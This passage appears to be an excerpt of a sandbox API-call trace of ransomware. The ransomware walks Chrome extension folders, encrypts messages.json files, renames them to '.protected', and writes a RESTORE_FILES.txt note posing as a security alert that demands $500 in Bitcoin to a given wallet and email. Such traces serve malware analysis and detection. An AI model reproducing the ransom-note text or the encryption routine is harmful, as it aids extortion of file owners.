| out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.623] CloseHandle (hObject=0x164) returned 1 [0083.623] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.623] lstrcmpiW (lpString1="hu", lpString2="Windows") returned -1 [0083.623] lstrcmpiW (lpString1="hu", lpString2="Program Files") returned -1 [0083.623] lstrcmpiW (lpString1="hu", lpString2="Program Files (x86)") returned -1 [0083.623] lstrcmpiW (lpString1="hu", lpString2="$Recycle.bin") returned 1 [0083.623] lstrcmpiW (lpString1="hu", lpString2="System Volume Information") returned -1 [0083.623] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu") returned 150 [0083.623] lstrcmpW (lpString1="hu", lpString2=".") returned 1 [0083.623] lstrcmpW (lpString1="hu", lpString2="..") returned 1 [0083.623] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\*") returned 152 [0083.623] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.623] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.623] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.623] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.623] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.624] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.624] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\.") returned 152 [0083.624] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.624] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.624] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.624] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.624] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.624] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.624] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.624] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\..") returned 153 [0083.624] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.624] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.624] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.624] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.624] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.624] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.624] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.624] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.624] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json") returned 164 [0083.624] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.624] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.624] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.624] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.624] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.625] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json") returned 164 [0083.625] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.625] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json") returned 164 [0083.625] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.625] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json") returned 164 [0083.625] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.625] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.634] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.634] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.635] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.635] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.643] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.643] CloseHandle (hObject=0x168) returned 1 [0083.651] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.protected") returned 174 [0083.651] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\messages.json.protected")) returned 1 [0083.652] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.652] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.652] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\RESTORE_FILES.txt") returned 168 [0083.652] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.653] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.653] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.658] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.658] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.658] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.658] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.658] CloseHandle (hObject=0x164) returned 1 [0083.658] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.659] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0083.659] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0083.659] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0083.659] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0083.659] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0083.659] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id") returned 150 [0083.659] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0083.659] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0083.659] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\*") returned 152 [0083.659] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.659] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.659] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.659] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.659] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.659] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.659] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\.") returned 152 [0083.659] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.659] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.659] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.659] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.659] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.659] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.659] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.659] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\..") returned 153 [0083.659] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.659] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.659] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.659] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.659] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.660] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.660] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.660] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.660] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json") returned 164 [0083.660] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.660] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.660] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.660] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.660] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.661] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json") returned 164 [0083.661] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.661] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json") returned 164 [0083.661] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.661] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json") returned 164 [0083.661] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.661] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.677] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.677] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.677] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.677] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.678] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.678] CloseHandle (hObject=0x168) returned 1 [0083.678] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.protected") returned 174 [0083.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\messages.json.protected")) returned 1 [0083.679] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.679] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.679] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\RESTORE_FILES.txt") returned 168 [0083.679] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.680] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.680] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.692] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0083.692] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.692] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.692] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, 